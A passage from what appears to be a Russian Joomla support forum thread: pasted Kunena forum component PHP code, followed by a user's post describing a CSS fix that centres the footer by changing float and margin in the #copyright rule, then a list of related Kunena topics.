            KunenaError::checkDatabaseError();
         }

         if ($userid == 0) {
            $kunena_app->redirect ( CKunenaLink::GetCategoryURL('showcat' , $catid, false ), $success_msg );
         } else {
            $kunena_app->redirect ( CKunenaLink::GetProfileURL($userid, false), $success_msg );
         }
         break;

      case 'karma' :
         include (JPATH_COMPONENT . DS . 'lib' . DS . 'kunena.karma.php');

         break;

      case 'thankyou':
         require_once(JPATH_COMPONENT.DS.'lib'.DS.'kunena.thankyou.php');
         $thankyou = new CKunenaThankyou ();
         $thankyou->setThankyou();

         break;

      case 'bulkactions' :
         switch ($do) {
            case "bulkDel" :
               CKunenaTools::KDeletePosts ( );

               break;

            case "bulkMove" :
               CKunenaTools::KMovePosts ( $catid );
               break;

            case "bulkFavorite" :
               if (!JRequest::checkToken()) {
                  $kunena_app->enqueueMessage ( JText::_ ( 'COM_KUNENA_ERROR_TOKEN' ), 'error' );
                  $kunena_app->redirect ( CKunenaLink::GetProfileURL($kunena_my->id, false) );
               }
               require_once(JPATH_ROOT.DS.'administrator/components/com_kunena/libraries/api.php');
               $KunenaUserAPI = new KunenaUserAPI();
               $cb = KGetArrayReverseInts ( "cb" );
               $result = $KunenaUserAPI->unfavoriteThreads($kunena_my->id, $cb);

               if ( $result ) {
                  $message = JText::_('COM_KUNENA_USER_UNFAVORITE_YES');
               } else {
                  $message = JText::_('COM_KUNENA_POST_UNFAVORITED_TOPIC');
               }

               $kunena_app->redirect(CKunenaLink::GetProfileURL($kunena_my->id, false),$message);
               break;

            case "bulkSub" :
               if (!JRequest::checkToken()) {
                  $kunena_app->enqueueMessage ( JText::_ ( 'COM_KUNENA_ERROR_TOKEN' ), 'error' );
                  $kunena_app->redirect ( CKunenaLink::GetProfileURL($kunena_my->id, false) );
               }
               require_once(JPATH_ROOT.DS.'administrator/components/com_kunena/libraries/api.php');
               $KunenaUserAPI = new KunenaUserAPI();
               $cb = KGetArrayReverseInts ( "cb" );
               $result = $KunenaUserAPI->unsubscribeThreads($kunena_my->id, $cb);

               if ( $result ) {
                  $message = JText::_('COM_KUNENA_USER_UNSUBSCRIBE_YES');
               } else {
                  $message = JText::_('COM_KUNENA_POST_NO_UNSUBSCRIBED_TOPIC');
               }

               $kunena_app->redirect(CKunenaLink::GetProfileURL($kunena_my->id, false),$message);
               break;
            case "bulkDelPerm" :
               CKunenaTools::KDeletePerm ( );
               break;

            case "bulkRestore" :
               CKunenaTools::KUndelete ( );
               break;
         }

         break;

      case 'templatechooser' :
         $fb_user_template = strval ( JRequest::getVar ( 'kunena_user_template', '', 'COOKIE' ) );

         $fb_user_img_template = strval ( JRequest::getVar ( 'kunena_user_img_template', $fb_user_img_template ) );
         $fb_change_template = strval ( JRequest::getVar ( 'kunena_change_template', $fb_user_template ) );
         $fb_change_img_template = strval ( JRequest::getVar ( 'kunena_change_img_template', $fb_user_img_template ) );

         if ($fb_change_template) {
            // clean template name

            $fb_change_template = preg_replace ( '#\W#', '', $fb_change_template );

            if (JString::strlen ( $fb_change_template ) >= 40) {
               $fb_change_template = JString::substr ( $fb_change_template, 0, 39 );
            }

            // check that template exists in case it was deleted

            if (file_exists ( KUNENA_PATH_TEMPLATE . DS . $fb_change_template . '/css/kunena.forum.css' )) {
               $lifetime = 60 * 10;
               $fb_current_template = $fb_change_template;
               setcookie ( 'kunena_user_template', "$fb_change_template", time () + $lifetime );
            } else {
               setcookie ( 'kunena_user_template', '', time () - 3600 );
            }
         }

         if ($fb_change_img_template) {
            // clean template name

            $fb_change_img_template = preg_replace ( '#\W#', '', $fb_change_img_template );

            if (JString::strlen ( $fb_change_img_template ) >= 40) {
               $fb_change_img_template = JString::substr ( $fb_change_img_template, 0, 39 );
            }

            // check that template exists in case it was deleted

            if (file_exists ( KUNENA_PATH_TEMPLATE . DS . $fb_change_img_template . '/css/kunena.forum.css' )) {
               $lifetime = 60 * 10;
               $fb_current_img_template = $fb_change_img_template;
               setcookie ( 'kunena_user_img_template', "$fb_change_img_template", time () + $lifetime );
            } else {
               setcookie ( 'kunena_user_img_template', '', time () - 3600 );
            }
         }

         $kunena_app->redirect ( CKunenaLink::GetKunenaURL(false) );
         break;

      case 'credits' :
         include (JPATH_COMPONENT . DS . 'lib' . DS . 'kunena.credits.php');

         break;

      default :
         require_once (KUNENA_PATH_FUNCS . DS . 'listcat.php');
         $page = new CKunenaListcat($catid);
         $page->display();

         break;
   }

   if(JDEBUG){
      $__profiler->mark('$func End');
   }

   // Bottom Module
   CKunenaTools::showModulePosition( 'kunena_bottom' );

   // PDF and RSS
   if ($kunena_config->enablerss || $kunena_config->enablepdf) {
      if ($catid>0) {
         kimport('category');
         $category = KunenaCategory::getInstance($catid);
         if ($category->pub_access == 0 && $category->parent) $rss_params = '&amp;catid=' . (int) $catid;
      } else {
         $rss_params = '';
      }
      if (isset($rss_params) || $kunena_config->enablepdf) {
         jimport ( 'joomla.version' );
         $jversion = new JVersion ();
         echo '<div class="krss-block">';
         if ($kunena_config->enablepdf && $func == 'view' && $jversion->RELEASE != '1.6') {
            // FIXME: add better translation:
            echo CKunenaLink::GetPDFLink($catid, $limit, $limitstart, $id, CKunenaTools::showIcon ( 'kpdf', JText::_('PDF') ), 'nofollow', '', JText::_('PDF'));
         }
         if ($kunena_config->enablerss && isset($rss_params)) {
            $document->addCustomTag ( '<link rel="alternate" type="application/rss+xml" title="' . JText::_('COM_KUNENA_LISTCAT_RSS'). '" href="' . CKunenaLink::GetRSSURL($rss_params). '" />' );
            echo CKunenaLink::GetRSSLink ( CKunenaTools::showIcon ( 'krss', JText::_('COM_KUNENA_LISTCAT_RSS') ), 'follow', $rss_params );
         }
         echo '</div>';
      }
   }

   $template = KunenaFactory::getTemplate();
   $this->params = $template->params;
   // Credits
   // echo '<div class="kcredits kms"> ' . CKunenaLink::GetTeamCreditsLink ( $catid, JText::_('COM_KUNENA_POWEREDBY') ). ' ' . CKunenaLink::GetCreditsLink ();
      if ($this->params->get('templatebyText')!=''):
   echo ' :: <a href ="'. $this->params->get('templatebyLink').'" rel="follow">' . $this->params->get('templatebyText') ;
   if ($this->params->get('templatebyName')) {
   echo ' '.$this->params->get('templatebyName').'</a>';
   } else { echo '</a>'; }
   endif;
   echo '</div>';

   // display footer

   // Show total time it took to create the page
   $__ktime = JProfiler::getmicrotime() - $__kstarttime;
?>
   <div class="kfooter">
      <span class="kfooter-time"><?php echo JText::_('COM_KUNENA_FOOTER_TIME_TO_CREATE').'&nbsp;'.sprintf('%0.2f', $__ktime).'&nbsp;'.JText::_('COM_KUNENA_FOOTER_TIME_SECONDS');?></span>
   </div>
</div>
<!-- closes Kunena div -->
<?php
$integration = KunenaFactory::getProfile();
$integration->close();

//$params = JComponentHelper::getParams( 'com_kunena' );
//if ($params->get( 'show_page_title' )) $document->setTitle ( $params->get( 'page_title' ) );

if (empty($_POST) && $format == 'html') {
   $default = KunenaRoute::getDefault();
   if ($default) $menu->setActive($default->id);
}

} // end of online

if(JDEBUG == 1){
   $__profiler->mark('Done');
   $__queries = $__profiler->getQueryCount();
   if(defined('JFIREPHP')){
      FB::log($__profiler->getBuffer(), 'Kunena Profiler');
      if($__queries>50){
         FB::error($__queries, 'Kunena Queries');
      } else if($__queries>35){
         FB::warn($__queries, 'Kunena Queries');
      } else {
         FB::log($__queries, 'Kunena Queries');
      }
   }
}
   ob_end_flush();
   }
   /**
   * Escapes a value for output in a view script.
   *
   * If escaping mechanism is one of htmlspecialchars or htmlentities, uses
   * {@link $_encoding} setting.
   *
   * @param  mixed $var The output to escape.
   * @return mixed The escaped value.
   */
   function escape($var)
   {
      return htmlspecialchars($var, ENT_COMPAT, 'UTF-8');
   }

   function redirect($url) {
      $app = JFactory::getApplication();
      $redirect = (array) $app->getUserState( 'com_kunena.redirect');
      if (isset($redirect[$url])) {
         // TODO: translate COM_KUNENA_WARNING_MENU_REDIRECT_LOOP
         KunenaError::warning(JText::sprintf('Infinite redirect loop detected in %s', $url), 'menu');
         return;
      }
      $redirect[$url] = 1;
      $app->setUserState( 'com_kunena.redirect', $redirect);
      $app->redirect ($url);
   }
}

$kunena = new KunenaApp();
*

Litron

  • Осваиваюсь на форуме
  • 19
  • 1 / 0
Блин, уважаемые, Вы своим молчанием ставите человека в безвыходное положение и тем самым заставляете его самому разбираться! ;D ;D ;D
Это шутка.
 И все таки решение нашел, может и неправильное, но работает. В таблице стилей нашел #copyright, отвечающий за нижнюю часть. В нем есть свойство float:left, так вот я ее заменил на clear:both, и ниже стоит margin:0 - добавил auto, получилось margin:0 auto. Все установилось как надо. (Почему-то если просто дописать в margin auto, а float не трогать, то эффекта ни какого нет - пока не разобрался почему).

Хотелось бы увидеть пояснения к моему решению проблемы.
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Не подхватывается файл локализации компонента Kunena v6.0.3

Автор Александр Кардаш

Ответов: 1
Просмотров: 3377
Последний ответ 02.04.2023, 18:12:09
от Александр Кардаш
Нужна помощь в переносе форума с Kunena на wordpress и любой плагин форума

Автор Zoltar22

Ответов: 0
Просмотров: 3084
Последний ответ 19.10.2022, 04:32:49
от Zoltar22
Форум Kunena. нет поля для ввода текста

Автор sarvasvova

Ответов: 2
Просмотров: 3602
Последний ответ 02.08.2022, 09:32:31
от crimeafrend
Kunena при создании новой темы не выводит поле для ввода текста

Автор sarvasvova

Ответов: 0
Просмотров: 6054
Последний ответ 18.11.2021, 00:31:10
от sarvasvova
Русификация Kunena

Автор pavel82

Ответов: 5
Просмотров: 30716
Последний ответ 04.06.2021, 14:44:49
от Elya